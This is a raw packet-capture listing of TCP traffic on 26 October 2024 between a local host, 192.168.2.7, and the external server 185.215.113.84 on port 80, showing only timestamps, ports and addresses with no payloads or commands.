Oct 26, 2024 07:27:21.222929955 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.222938061 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.222958088 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.222973108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.222984076 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223001957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223002911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223021030 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223047018 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223087072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223098993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223109961 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223119020 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223123074 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223134995 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223153114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223190069 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223212957 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223234892 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223248959 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223376989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223396063 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223404884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223417044 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223417044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223424911 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223447084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223459959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223465919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223481894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223493099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223498106 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223511934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223516941 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223526001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223536968 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223543882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223563910 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223603010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223613024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223640919 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223664999 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223675966 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223706961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223738909 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223751068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223763943 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223776102 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223778963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223798990 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223809004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223820925 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223834038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223845959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223860979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223890066 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.223954916 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223967075 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223978043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.223997116 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224015951 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224061012 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224078894 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224098921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224101067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224112034 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224123001 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224124908 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224134922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224147081 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224176884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224293947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224306107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224318027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224327087 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224345922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224358082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224381924 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224452019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224463940 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224482059 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224492073 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224494934 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224507093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.224531889 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.224545956 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.280159950 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280183077 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280201912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280215025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280225039 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.280229092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280242920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280242920 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.280253887 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280271053 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.280272007 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.280287027 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.280311108 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294356108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294373989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294385910 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294399023 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294406891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294411898 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294425964 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294429064 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294445992 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294457912 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294460058 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294471025 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294481993 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294482946 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294496059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294498920 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294511080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294523954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294523954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294534922 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294536114 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294549942 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294564962 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294594049 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294600010 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294616938 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294631004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294641972 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294651031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294656038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294667006 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294667959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294682026 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294698954 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294712067 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294871092 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294898987 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294910908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.294912100 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.294948101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295013905 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295026064 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295052052 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295062065 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295072079 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295075893 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295079947 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295084953 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295092106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295154095 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295161963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295172930 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295186996 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295186996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295202017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.295217037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295224905 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.295239925 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.300503016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.300523996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.300540924 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.300554037 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.300558090 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.300565958 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.300565958 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.300586939 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.300606012 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340006113 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340025902 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340037107 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340056896 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340082884 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340085983 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340100050 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340130091 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340171099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340182066 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340192080 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340202093 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340210915 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340215921 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340228081 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340239048 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340267897 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340289116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340307951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340332031 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340344906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340358019 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340394974 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340416908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340429068 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340440989 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340459108 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340464115 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340477943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340502977 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340507030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340518951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340543032 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340547085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340559959 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340562105 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340581894 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340598106 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340600014 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340610027 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340621948 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340630054 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340648890 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340677023 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340692043 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340703011 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340723038 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340724945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340734005 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340745926 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340750933 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340770960 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340797901 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340893030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340929985 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340934992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340940952 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.340965033 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.340979099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341017962 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341029882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341057062 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341073990 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341084003 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341110945 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341137886 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341152906 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341164112 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341176033 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341185093 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341187954 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341204882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341233969 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341258049 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341269016 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341279984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341295004 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341319084 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341487885 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341500998 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341512918 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341526985 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341530085 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341543913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341557026 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341576099 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341576099 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341587067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341610909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341610909 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341624022 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341639996 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341651917 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341662884 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341675043 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341685057 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341711044 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341785908 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341798067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341819048 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341824055 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341841936 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341850042 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341856956 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341864109 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341876984 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341883898 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341892004 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341924906 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341949940 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.341976881 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.341989040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.342000008 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.342012882 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.342012882 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.342034101 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.342055082 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.342098951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.342109919 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.342144966 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.384918928 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.384933949 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.384946108 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.384978056 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.384996891 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.397958040 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.398015976 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.398016930 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.398029089 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.398073912 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.398435116 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.398452044 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.398509979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.398509979 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412153006 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412167072 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412178993 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412215948 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412246943 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412276030 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412287951 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412302017 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412317038 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412319899 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412327051 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412333965 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412345886 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412353992 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412358046 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412368059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412368059 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412377119 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412394047 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412398100 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412400961 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412409067 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412420988 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412426949 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412446976 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412453890 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412472963 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412492037 CEST	49982	80	192.168.2.7	185.215.113.84
Oct 26, 2024 07:27:21.412506104 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412518024 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412529945 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412540913 CEST	80	49982	185.215.113.84	192.168.2.7
Oct 26, 2024 07:27:21.412540913 CEST	49982	80	192.168.2.7	185.215.113.84
